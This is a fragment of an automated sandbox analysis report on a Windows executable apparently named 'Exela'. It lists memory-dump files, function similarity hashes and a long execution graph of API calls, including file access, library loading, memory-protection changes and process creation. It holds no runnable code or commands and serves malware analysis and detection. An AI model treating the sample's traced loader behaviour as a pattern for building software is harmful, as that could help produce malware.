                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                    • Instruction ID: 67482ae86b62a841f54a4e3e387fac0227093d21e7b850cc28262326b72d379f
                                                                                                    • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                    • Instruction Fuzzy Hash: 1C115E32618B9582EB20AF19F440269B7E0FF88B98F984270DACD07755DF3CC951CB00
                                                                                                    Function 00007FF75AEB07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                    • String ID: :
                                                                                                    • API String ID: 2595371189-336475711
                                                                                                    • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                    • Instruction ID: 7bd18ae9e57faac16c5d06d74c4a4452f4b3837edea91fa4ba743aa71ec364a3
                                                                                                    • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                    • Instruction Fuzzy Hash: 1201842291832786F721BF60A46B27EE3A0FF44704FC81175D54D46691DF2CE9048A24

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:8.7%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:1.5%
                                                                                                    Total number of Nodes:536
                                                                                                    Total number of Limit Nodes:10
                                                                                                    execution_graph 10028 7ff75aea99d1 10029 7ff75aea99d6 10028->10029 10030 7ff75aea99fd GetModuleHandleW 10029->10030 10031 7ff75aea9a47 10029->10031 10030->10031 10032 7ff75aea9a0a 10030->10032 10032->10031 10491 7ff75aead3d0 10492 7ff75aead3e6 10491->10492 10495 7ff75aead3e2 10491->10495 10493 7ff75aead409 SetFilePointerEx 10492->10493 10492->10495 10494 7ff75aead423 GetFileSizeEx 10493->10494 10493->10495 10494->10495 10557 7ffb08032aaf 10558 7ffb08032ab4 IsProcessorFeaturePresent 10557->10558 10559 7ffb08032acc capture_previous_context 10558->10559 10380 7ffb081524be 10381 7ffb08394c90 IsProcessorFeaturePresent 10380->10381 10382 7ffb08394ca7 10381->10382 10383 7ffb08394caf capture_current_context 10381->10383 10382->10383 10384 7ffb08394d27 10383->10384 10496 7ff75aeaf3c8 10497 7ff75aeaf3e5 10496->10497 10500 7ff75aeaf408 10497->10500 10499 7ff75aeaf3ee 10501 7ff75aeaf434 10500->10501 10502 7ff75aeaf458 10501->10502 10503 7ff75aeaec08 HeapAlloc 10501->10503 10502->10499 10504 7ff75aeaf48b 10503->10504 10505 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10504->10505 10505->10502 10363 7ffb084a3230 10364 7ffb084a3dd1 10363->10364 10371 7ffb084a3248 10363->10371 10365 7ffb084a3cde LoadLibraryA 10366 7ffb084a3cf8 10365->10366 10369 7ffb084a3d17 GetProcAddress 10366->10369 10366->10371 10368 7ffb084a3d39 VirtualProtect VirtualProtect 10368->10364 10369->10366 10370 7ffb084a3d2e 10369->10370 10371->10365 10371->10368 10372 7ff75ae9a34b 10374 7ff75ae9a351 10372->10374 10375 7ff75ae9ac06 10374->10375 10376 7ff75ae9be00 10374->10376 10377 7ff75ae9be23 10376->10377 10378 7ff75ae9be41 10376->10378 10379 7ff75aead66c HeapAlloc 10377->10379 10378->10375 10379->10378 10566 7ffb08031f7a 10567 7ffb080321d0 00007FFB2ADA1640 10566->10567 10568 7ffb08031f98 10567->10568 10506 7ff75aea1bc0 10507 7ff75aea1bf3 10506->10507 10509 7ff75aea1c5f 10507->10509 10510 7ff75aea0bf0 10507->10510 10511 7ff75aea0c16 10510->10511 10512 7ff75aea0c27 10510->10512 10511->10509 10512->10511 10513 7ff75aead66c _fread_nolock HeapAlloc 10512->10513 10514 7ff75aea0c54 10513->10514 10515 7ff75aea0c68 10514->10515 10516 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10514->10516 10517 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10515->10517 10516->10515 10517->10511 10518 7ff75ae9cbc0 10519 7ff75ae9cbd0 10518->10519 10520 7ff75ae9cbd5 _set_fmode 10519->10520 10521 7ff75ae9cbe1 _RTC_Initialize 10520->10521 10385 7ff75aeab400 10386 7ff75aeab41f FlsGetValue 10385->10386 10387 7ff75aeab43a FlsSetValue 10385->10387 10388 7ff75aeab434 10386->10388 10389 7ff75aeab42c 10386->10389 10387->10389 10390 7ff75aeab447 10387->10390 10388->10387 10400 7ff75aeaec08 10390->10400 10392 7ff75aeab456 10393 7ff75aeab474 FlsSetValue 10392->10393 10394 7ff75aeab464 FlsSetValue 10392->10394 10395 7ff75aeab492 10393->10395 10396 7ff75aeab480 FlsSetValue 10393->10396 10397 7ff75aeab46d 10394->10397 10399 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10395->10399 10396->10397 10398 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10397->10398 10398->10389 10399->10389 10403 7ff75aeaec19 10400->10403 10401 7ff75aeaec4e HeapAlloc 10402 7ff75aeaec68 10401->10402 10401->10403 10402->10392 10403->10401 10403->10402 10193 7ff75aeac084 10194 7ff75aeac0db 10193->10194 10196 7ff75aeac0ad 10193->10196 10194->10196 10197 7ff75aeac1a4 10194->10197 10198 7ff75aeac1cb 10197->10198 10199 7ff75aeac1e2 SetFilePointerEx 10198->10199 10201 7ff75aeac1d1 10198->10201 10200 7ff75aeac1fa GetLastError 10199->10200 10199->10201 10200->10201 10201->10196 10522 7ff75aeb03c4 10523 7ff75aeb03e0 10522->10523 10524 7ff75aeb040f FlushFileBuffers 10523->10524 10525 7ff75aeb042b 10523->10525 10524->10525 10526 7ff75aeb041e GetLastError 10524->10526 10526->10525 10545 7ffb0815160e 10546 7ffb08394b70 IsProcessorFeaturePresent 10545->10546 10547 7ffb08394b88 10546->10547 10548 7ffb08394b8f capture_previous_context 10546->10548 10547->10548 10549 7ffb08394c3d 10548->10549 10569 7ffb08031fa0 10572 7ffb08031fc0 00007FFB2ADB6570 10569->10572 10571 7ffb08031fb9 10573 7ffb08032006 00007FFB2ADB6570 10572->10573 10574 7ffb08033b8a 10572->10574 10578 7ffb08032024 10573->10578 10584 7ffb08032060 10573->10584 10590 7ffb08033f30 10574->10590 10577 7ffb08033f30 00007FFB2ADB6570 10579 7ffb08033bea 10577->10579 10578->10584 10585 7ffb08032110 10578->10585 10581 7ffb08033f30 00007FFB2ADB6570 10579->10581 10581->10584 10582 7ffb0803205c 10583 7ffb08032110 2 API calls 10582->10583 10582->10584 10583->10582 10584->10571 10586 7ffb080321d0 00007FFB2ADA1640 10585->10586 10588 7ffb08032153 10586->10588 10587 7ffb08032700 IsProcessorFeaturePresent 10589 7ffb080321ad 10587->10589 10588->10587 10589->10582 10591 7ffb08033f5c 10590->10591 10593 7ffb08033bc2 10590->10593 10592 7ffb08033f8d 00007FFB2ADB6570 10591->10592 10591->10593 10592->10591 10593->10577 10560 7ffb081532d3 __GSHandlerCheck 10561 7ffb08394a58 10560->10561 10564 7ffb081521ad __GSHandlerCheckCommon 10561->10564 10563 7ffb08394a6b 10564->10563 10565 7ffb08394a7c 10564->10565 10527 7ffb0803352a __scrt_dllmain_exception_filter 10404 7ffb080344a8 10405 7ffb080344c9 10404->10405 10406 7ffb080344ee 10404->10406 10406->10405 10408 7ffb08034598 10406->10408 10409 7ffb080345bf 10408->10409 10412 7ffb08032700 10409->10412 10411 7ffb080346f4 10411->10405 10413 7ffb08032709 10412->10413 10414 7ffb08032714 10413->10414 10415 7ffb08032ab4 IsProcessorFeaturePresent 10413->10415 10414->10411 10416 7ffb08032acc capture_previous_context 10415->10416 10416->10411 10417 7ff75aeb2bfc 10418 7ff75aeb2c05 10417->10418 10443 7ff75aeb2d00 10417->10443 10419 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10418->10419 10421 7ff75aeb2c1f 10418->10421 10419->10421 10420 7ff75aeb2c31 10423 7ff75aeb2c43 10420->10423 10424 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10420->10424 10421->10420 10422 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10421->10422 10422->10420 10425 7ff75aeb2c55 10423->10425 10426 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10423->10426 10424->10423 10427 7ff75aeb2c67 10425->10427 10429 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10425->10429 10426->10425 10428 7ff75aeb2c79 10427->10428 10430 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10427->10430 10431 7ff75aeb2c8b 10428->10431 10432 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10428->10432 10429->10427 10430->10428 10433 7ff75aeb2c9d 10431->10433 10434 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10431->10434 10432->10431 10435 7ff75aeb2caf 10433->10435 10436 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10433->10436 10434->10433 10437 7ff75aeb2cc1 10435->10437 10439 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10435->10439 10436->10435 10438 7ff75aeb2cd6 10437->10438 10440 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10437->10440 10441 7ff75aeb2ceb 10438->10441 10442 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10438->10442 10439->10437 10440->10438 10441->10443 10444 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10441->10444 10442->10441 10444->10443 10445 7ff75aea93fc 10446 7ff75aea9424 10445->10446 10447 7ff75aeaec08 HeapAlloc 10446->10447 10454 7ff75aea945f 10447->10454 10448 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10449 7ff75aea946e 10448->10449 10450 7ff75aea94e1 10451 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10450->10451 10451->10449 10452 7ff75aeaec08 HeapAlloc 10452->10454 10453 7ff75aea94d0 10456 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10453->10456 10454->10450 10454->10452 10454->10453 10455 7ff75aea9504 10454->10455 10457 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10454->10457 10458 7ff75aea9467 10454->10458 10456->10458 10457->10454 10458->10448 10528 7ffb08034da8 10530 7ffb08034dd1 10528->10530 10529 7ffb08034e00 10530->10529 10532 7ffb08034eec 10530->10532 10537 7ffb080321d0 10532->10537 10534 7ffb08034f22 10535 7ffb08032700 IsProcessorFeaturePresent 10534->10535 10536 7ffb08034f69 10535->10536 10536->10529 10538 7ffb080321fb 10537->10538 10540 7ffb0803222f 10537->10540 10538->10540 10541 7ffb08034100 10538->10541 10540->10534 10540->10540 10544 7ffb080326d0 10541->10544 10543 7ffb08034126 00007FFB2ADA1640 10543->10540 10544->10543 10459 7ff75aeb9bf0 10460 7ff75aeb9c0c 10459->10460 10461 7ff75aeb9c23 10460->10461 10462 7ff75aeb9c10 _FindPESection 10460->10462 10462->10461 10211 7ff75ae9ccac 10212 7ff75ae9ccc0 10211->10212 10213 7ff75ae9cd0b 10212->10213 10214 7ff75ae9ccc8 __scrt_acquire_startup_lock 10212->10214 10214->10213 10216 7ff75ae9cce6 10214->10216 10215 7ff75ae9cd3c __scrt_release_startup_lock 10219 7ff75ae9cd48 10215->10219 10216->10213 10216->10215 10217 7ff75ae9cd91 __scrt_get_show_window_mode 10218 7ff75ae9cd9e 10217->10218 10221 7ff75ae91000 10218->10221 10219->10217 10222 7ff75ae91009 10221->10222 10256 7ff75ae936b0 10222->10256 10224 7ff75ae93804 10237 7ff75ae93808 10224->10237 10263 7ff75ae91950 10224->10263 10226 7ff75ae93825 10227 7ff75ae945b0 13 API calls 10226->10227 10240 7ff75ae9383c 10226->10240 10228 7ff75ae9392b 10227->10228 10228->10237 10281 7ff75ae97f80 10228->10281 10230 7ff75ae9395d 10231 7ff75ae93962 10230->10231 10233 7ff75ae93984 10230->10233 10232 7ff75aea00bc 4 API calls 10231->10232 10232->10237 10233->10233 10234 7ff75ae91950 30 API calls 10233->10234 10234->10240 10235 7ff75ae93dc4 10236 7ff75ae99400 2 API calls 10235->10236 10239 7ff75ae93dd7 SetDllDirectoryW 10236->10239 10237->10213 10238 7ff75ae93da7 SetDllDirectoryW LoadLibraryExW 10238->10235 10254 7ff75ae93e0a 10239->10254 10240->10235 10240->10237 10240->10238 10242 7ff75ae93ffc 10244 7ff75ae94006 PostMessageW GetMessageW 10242->10244 10245 7ff75ae94029 10242->10245 10243 7ff75ae93f1b 10285 7ff75ae933c0 10243->10285 10244->10245 10274 7ff75ae93360 10245->10274 10247 7ff75ae93f23 10247->10237 10248 7ff75ae93f2b 10247->10248 10250 7ff75ae93f41 PostMessageW GetMessageW 10248->10250 10251 7ff75ae93f64 10248->10251 10250->10251 10289 7ff75ae98bd0 10251->10289 10253 7ff75ae94039 10254->10242 10254->10243 10255 7ff75ae93f7f 10255->10237 10257 7ff75ae9c8c0 10256->10257 10258 7ff75ae936bc GetModuleFileNameW 10257->10258 10259 7ff75ae93710 10258->10259 10260 7ff75ae936eb GetLastError 10258->10260 10325 7ff75ae992f0 FindFirstFileExW 10259->10325 10262 7ff75ae93706 10260->10262 10262->10224 10264 7ff75ae945b0 13 API calls 10263->10264 10265 7ff75ae91985 10264->10265 10266 7ff75ae91c43 10265->10266 10267 7ff75ae97f80 15 API calls 10265->10267 10266->10226 10269 7ff75ae919cb 10267->10269 10268 7ff75aea00bc 4 API calls 10268->10266 10270 7ff75aea040c _fread_nolock 15 API calls 10269->10270 10273 7ff75ae919e9 10269->10273 10271 7ff75ae91a20 10270->10271 10272 7ff75aea040c _fread_nolock 15 API calls 10271->10272 10271->10273 10272->10273 10273->10268 10328 7ff75ae96350 10274->10328 10276 7ff75ae9336e 10277 7ff75ae9338d 10276->10277 10339 7ff75ae964f0 10276->10339 10277->10253 10279 7ff75ae93381 10279->10277 10343 7ff75ae96040 10279->10343 10283 7ff75ae97fa4 10281->10283 10282 7ff75ae9807b 10282->10230 10283->10282 10284 7ff75aea040c _fread_nolock 15 API calls 10283->10284 10284->10283 10287 7ff75ae933ce 10285->10287 10286 7ff75ae94550 2 API calls 10286->10287 10287->10286 10288 7ff75ae935c7 10287->10288 10288->10247 10290 7ff75ae98bf0 10289->10290 10291 7ff75ae99400 2 API calls 10290->10291 10292 7ff75ae98c1d SetConsoleCtrlHandler GetStartupInfoW 10291->10292 10293 7ff75ae98c6a 10292->10293 10294 7ff75ae98cc0 GetCommandLineW CreateProcessW 10293->10294 10295 7ff75ae98d18 GetLastError 10294->10295 10296 7ff75ae98d3d RegisterClassW 10294->10296 10297 7ff75ae98d33 10295->10297 10298 7ff75ae98d81 CreateWindowExW 10296->10298 10299 7ff75ae98d7b GetLastError 10296->10299 10297->10255 10300 7ff75ae98ddf ShowWindow 10298->10300 10301 7ff75ae98dd7 GetLastError 10298->10301 10299->10298 10302 7ff75ae98dea WaitForSingleObject 10300->10302 10301->10302 10303 7ff75ae98e78 10302->10303 10304 7ff75ae98dfc 10302->10304 10305 7ff75ae98ec2 10303->10305 10306 7ff75ae98e81 WaitForSingleObject 10303->10306 10304->10306 10311 7ff75ae98e05 GetLastError 10304->10311 10312 7ff75ae98e14 PeekMessageW 10304->10312 10309 7ff75ae98fb0 GetMessageW 10305->10309 10310 7ff75ae98ecf QueryPerformanceFrequency QueryPerformanceCounter 10305->10310 10307 7ff75ae98fe8 10306->10307 10308 7ff75ae98e97 TerminateProcess 10306->10308 10315 7ff75ae99001 GetExitCodeProcess CloseHandle CloseHandle 10307->10315 10316 7ff75ae98ff4 DestroyWindow 10307->10316 10317 7ff75ae98eaf WaitForSingleObject 10308->10317 10318 7ff75ae98ea9 GetLastError 10308->10318 10313 7ff75ae98f9b 10309->10313 10314 7ff75ae98fcb TranslateMessage DispatchMessageW 10309->10314 10319 7ff75ae98ef0 MsgWaitForMultipleObjects PeekMessageW 10310->10319 10311->10304 10320 7ff75ae98e33 TranslateMessage DispatchMessageW PeekMessageW 10312->10320 10321 7ff75ae98e66 WaitForSingleObject 10312->10321 10313->10307 10313->10309 10314->10313 10315->10297 10316->10315 10317->10307 10318->10317 10322 7ff75ae98f2a 10319->10322 10320->10320 10320->10321 10321->10303 10321->10304 10322->10309 10323 7ff75ae98f30 TranslateMessage DispatchMessageW PeekMessageW 10322->10323 10324 7ff75ae98f6c QueryPerformanceCounter 10322->10324 10323->10322 10323->10323 10324->10313 10324->10319 10326 7ff75ae9932f FindClose 10325->10326 10327 7ff75ae99342 10325->10327 10326->10327 10327->10262 10329 7ff75ae96365 10328->10329 10334 7ff75ae963aa 10329->10334 10347 7ff75ae94550 10329->10347 10331 7ff75ae9640d 10332 7ff75ae99070 3 API calls 10331->10332 10333 7ff75ae9641b 10331->10333 10332->10333 10333->10334 10351 7ff75ae99070 10333->10351 10334->10276 10336 7ff75ae96466 10336->10334 10337 7ff75ae99400 2 API calls 10336->10337 10338 7ff75ae9648a GetLastError 10337->10338 10338->10334 10340 7ff75ae96516 10339->10340 10342 7ff75ae9651e 10340->10342 10355 7ff75ae94d40 10340->10355 10342->10279 10344 7ff75ae96060 10343->10344 10344->10344 10345 7ff75ae96089 10344->10345 10346 7ff75ae91470 30 API calls 10344->10346 10345->10277 10346->10344 10348 7ff75ae9455a 10347->10348 10349 7ff75ae99400 2 API calls 10348->10349 10350 7ff75ae9457f 10349->10350 10350->10331 10352 7ff75ae99400 2 API calls 10351->10352 10353 7ff75ae99084 LoadLibraryExW 10352->10353 10354 7ff75ae990a3 10353->10354 10354->10336 10356 7ff75ae94d55 10355->10356 10357 7ff75ae99400 2 API calls 10356->10357 10362 7ff75ae94e23 10356->10362 10358 7ff75ae94df6 10357->10358 10359 7ff75ae99400 2 API calls 10358->10359 10360 7ff75ae94e0d 10359->10360 10361 7ff75ae99400 2 API calls 10360->10361 10361->10362 10362->10342 10033 7ff75ae92fe0 10035 7ff75ae92ff0 10033->10035 10036 7ff75ae9302b 10035->10036 10037 7ff75ae91470 10035->10037 10048 7ff75ae945b0 10037->10048 10039 7ff75ae9149b 10039->10035 10040 7ff75ae91493 10040->10039 10041 7ff75ae91538 10040->10041 10046 7ff75ae9154b 10040->10046 10047 7ff75ae914d5 10040->10047 10056 7ff75ae91210 10041->10056 10045 7ff75ae915c4 10045->10035 10046->10047 10064 7ff75aea040c 10046->10064 10060 7ff75aea00bc 10047->10060 10049 7ff75ae945bc 10048->10049 10067 7ff75ae99400 10049->10067 10051 7ff75ae945e4 10052 7ff75ae99400 2 API calls 10051->10052 10053 7ff75ae945f7 10052->10053 10072 7ff75aea6004 10053->10072 10055 7ff75ae94606 10055->10040 10057 7ff75ae91268 10056->10057 10058 7ff75ae9126f 10057->10058 10059 7ff75aea040c _fread_nolock 15 API calls 10057->10059 10058->10047 10059->10057 10061 7ff75aea00ec 10060->10061 10108 7ff75ae9fe98 10061->10108 10063 7ff75aea0105 10063->10045 10135 7ff75aea042c 10064->10135 10066 7ff75aea0424 10066->10046 10068 7ff75ae99446 10067->10068 10069 7ff75ae99422 MultiByteToWideChar 10067->10069 10070 7ff75ae99463 MultiByteToWideChar 10068->10070 10071 7ff75ae9945c 10068->10071 10069->10068 10069->10071 10070->10071 10071->10051 10073 7ff75aea5f38 10072->10073 10074 7ff75aea5f5e 10073->10074 10076 7ff75aea5f91 10073->10076 10075 7ff75aea5f63 _invalid_parameter_noinfo 10074->10075 10077 7ff75aea5f6e 10075->10077 10076->10077 10079 7ff75aeaff3c 10076->10079 10077->10055 10080 7ff75aeaff62 10079->10080 10082 7ff75aeaff96 10080->10082 10083 7ff75aeb6dc4 10080->10083 10082->10077 10086 7ff75aeb63c4 10083->10086 10085 7ff75aeb6df1 10085->10082 10087 7ff75aeb63f9 10086->10087 10088 7ff75aeb63db 10086->10088 10087->10088 10090 7ff75aeb6415 10087->10090 10089 7ff75aeb63e0 _invalid_parameter_noinfo 10088->10089 10092 7ff75aeb63ee 10089->10092 10093 7ff75aeb69d4 10090->10093 10092->10085 10094 7ff75aeb6a1b 10093->10094 10095 7ff75aeb6a86 CreateFileW 10094->10095 10096 7ff75aeb6a49 10094->10096 10097 7ff75aeb6b6c GetFileType 10095->10097 10100 7ff75aeb6af1 10095->10100 10096->10092 10098 7ff75aeb6b79 GetLastError 10097->10098 10104 7ff75aeb6bca 10097->10104 10101 7ff75aea4eec 10098->10101 10099 7ff75aeb6b39 GetLastError 10099->10096 10100->10099 10102 7ff75aeb6aff CreateFileW 10100->10102 10103 7ff75aeb6b88 CloseHandle 10101->10103 10102->10097 10102->10099 10103->10096 10107 7ff75aeb6bba 10103->10107 10104->10096 10105 7ff75aeb6d0c CloseHandle CreateFileW 10104->10105 10106 7ff75aeb6d53 GetLastError 10105->10106 10105->10107 10106->10107 10107->10096 10109 7ff75ae9fee1 10108->10109 10111 7ff75ae9feb3 10108->10111 10109->10111 10112 7ff75ae9ff14 10109->10112 10111->10063 10113 7ff75ae9ff2f 10112->10113 10114 7ff75ae9ff54 10112->10114 10113->10111 10114->10113 10118 7ff75aeaaa6c 10114->10118 10116 7ff75ae9ff83 10116->10113 10122 7ff75aeaa9b8 10116->10122 10119 7ff75aeaaa98 10118->10119 10121 7ff75aeaaa80 10118->10121 10119->10121 10126 7ff75aeaa9f4 10119->10126 10121->10116 10123 7ff75aeaa9e5 10122->10123 10124 7ff75aeaa9bd RtlFreeHeap 10122->10124 10123->10113 10124->10123 10125 7ff75aeaa9d8 GetLastError 10124->10125 10125->10123 10127 7ff75aeaaa10 10126->10127 10129 7ff75aeaaa45 10127->10129 10130 7ff75aeaabc8 10127->10130 10129->10121 10133 7ff75aeaabe4 10130->10133 10131 7ff75aeaac33 CloseHandle 10132 7ff75aeaac40 GetLastError 10131->10132 10134 7ff75aeaabea 10131->10134 10132->10134 10133->10131 10133->10134 10134->10129 10136 7ff75aea0456 10135->10136 10137 7ff75aea0485 10135->10137 10136->10137 10138 7ff75aea04a2 10136->10138 10139 7ff75aea0465 10136->10139 10137->10066 10142 7ff75aea01ac 10138->10142 10141 7ff75aea047a _invalid_parameter_noinfo 10139->10141 10141->10137 10143 7ff75aea01f5 10142->10143 10146 7ff75aea01db 10142->10146 10143->10137 10144 7ff75aea01f0 _invalid_parameter_noinfo 10144->10143 10146->10143 10148 7ff75aea01e5 10146->10148 10149 7ff75aea02e1 _invalid_parameter_noinfo 10146->10149 10150 7ff75aeabacc 10146->10150 10176 7ff75aeabf1c 10146->10176 10148->10144 10149->10146 10151 7ff75aeabaf4 10150->10151 10152 7ff75aeabb0d 10150->10152 10151->10146 10152->10151 10154 7ff75aeabb61 10152->10154 10155 7ff75aeabb92 10152->10155 10153 7ff75aeabef9 _invalid_parameter_noinfo 10153->10151 10154->10153 10156 7ff75aeabbb9 10155->10156 10157 7ff75aeabbf3 10155->10157 10160 7ff75aeabbc6 10155->10160 10156->10160 10164 7ff75aeabbe2 10156->10164 10182 7ff75aead66c 10157->10182 10159 7ff75aeabc04 10161 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10159->10161 10162 7ff75aeabbd2 _invalid_parameter_noinfo 10160->10162 10163 7ff75aeabc0e 10161->10163 10175 7ff75aeabc1d 10162->10175 10166 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10163->10166 10165 7ff75aeabd8e 10164->10165 10168 7ff75aeabd21 GetConsoleMode 10164->10168 10164->10175 10167 7ff75aeabd93 ReadFile 10165->10167 10166->10164 10169 7ff75aeabdb9 10167->10169 10170 7ff75aeabead GetLastError 10167->10170 10168->10165 10171 7ff75aeabd35 10168->10171 10169->10170 10169->10175 10170->10175 10171->10167 10173 7ff75aeabd3f ReadConsoleW 10171->10173 10172 7ff75aeaa9b8 __free_lconv_mon 2 API calls 10172->10151 10174 7ff75aeabd63 GetLastError 10173->10174 10173->10175 10174->10175 10175->10172 10177 7ff75aeabf39 10176->10177 10179 7ff75aeabf64 10176->10179 10178 7ff75aeabf3e _invalid_parameter_noinfo 10177->10178 10181 7ff75aeabf49 10178->10181 10179->10181 10186 7ff75aeab9ac 10179->10186 10181->10146 10183 7ff75aead67b 10182->10183 10185 7ff75aead6b5 10182->10185 10184 7ff75aead69e HeapAlloc 10183->10184 10183->10185 10184->10183 10184->10185 10185->10159 10187 7ff75aeaba06 10186->10187 10192 7ff75aeab9d6 10186->10192 10188 7ff75aeaba7b 10187->10188 10191 7ff75aeaba1f 10187->10191 10190 7ff75aeabacc _fread_nolock 10 API calls 10188->10190 10188->10192 10189 7ff75aeaba32 _invalid_parameter_noinfo 10189->10192 10190->10192 10191->10189 10192->10181 10467 7ffb080324c0 10469 7ffb080324e6 10467->10469 10468 7ffb08032555 10469->10468 10471 7ffb08032610 10469->10471 10472 7ffb08032621 10471->10472 10473 7ffb08033f11 00007FFB02E0767C 10472->10473 10474 7ffb0803266a 10472->10474 10474->10468 10550 7ffb08032a40 10551 7ffb08032a5c 10550->10551 10552 7ffb08032a61 10550->10552 10554 7ffb08032bfc 10551->10554 10555 7ffb08032c1f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10554->10555 10556 7ffb08032c93 10554->10556 10555->10556 10556->10552 10594 7ffb08031000 10595 7ffb0803101d 10594->10595 10598 7ffb08033578 10594->10598 10595->10598 10599 7ffb08031090 10595->10599 10597 7ffb08031077 10598->10598 10600 7ffb080311ae 10599->10600 10601 7ffb080310b3 10599->10601 10600->10597 10602 7ffb080311d0 5 API calls 10601->10602 10603 7ffb080310cb 10601->10603 10602->10603 10604 7ffb08031118 10603->10604 10605 7ffb08031107 10603->10605 10608 7ffb080336c8 10603->10608 10618 7ffb08031880 10603->10618 10604->10597 10610 7ffb080311d0 10605->10610 10609 7ffb08031880 3 API calls 10608->10609 10609->10604 10611 7ffb08031880 3 API calls 10610->10611 10617 7ffb080311f8 10611->10617 10612 7ffb08033862 10613 7ffb0803135a 00007FFB02E0767C 10614 7ffb08032700 IsProcessorFeaturePresent 10613->10614 10615 7ffb0803137e 10614->10615 10615->10604 10616 7ffb0803152c 00007FFB02E0767C 10616->10617 10617->10612 10617->10613 10617->10616 10623 7ffb080318bf 10618->10623 10619 7ffb08031b17 00007FFB02E0767C 10620 7ffb08033a5e 10619->10620 10619->10623 10620->10603 10621 7ffb08031d75 10621->10603 10622 7ffb08033a4d 00007FFB02E0767C 10622->10620 10623->10619 10623->10621 10623->10622 10624 7ffb08031c3d 10623->10624 10627 7ffb08033a0e 10623->10627 10625 7ffb08032700 IsProcessorFeaturePresent 10624->10625 10626 7ffb08031c70 10625->10626 10626->10603 10627->10622 10202 7ff75aea5698 10203 7ff75aea56cf 10202->10203 10206 7ff75aea56b2 10202->10206 10204 7ff75aea56e2 CreateFileW 10203->10204 10203->10206 10205 7ff75aea5716 10204->10205 10210 7ff75aea574c 10204->10210 10208 7ff75aea5741 CloseHandle 10205->10208 10209 7ff75aea572b CloseHandle 10205->10209 10207 7ff75aea56bf _invalid_parameter_noinfo 10206->10207 10207->10210 10208->10210 10209->10210 10475 7ff75aeb93d8 10476 7ff75aeb93f6 10475->10476 10477 7ff75aeb940a 10475->10477 10476->10477 10478 7ff75aeb93fb _set_statfp 10476->10478 10479 7ff75aeb9425 10477->10479 10480 7ff75aeb941b _set_statfp 10477->10480 10482 7ff75aeb945e 10478->10482 10481 7ff75aeb9432 _set_statfp 10479->10481 10484 7ff75aeb9441 10479->10484 10480->10482 10481->10482 10483 7ff75aeb947b 10482->10483 10485 7ff75aeb946e _set_statfp 10482->10485 10484->10482 10486 7ff75aeb9454 _set_statfp 10484->10486 10485->10483 10486->10482 10487 7ff75aea83d8 10488 7ff75aea83f7 10487->10488 10490 7ff75aea840a 10487->10490 10489 7ff75aea83fc _invalid_parameter_noinfo 10488->10489 10489->10490

                                                                                                    Executed Functions

                                                                                                    Function 00007FF75AE91000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
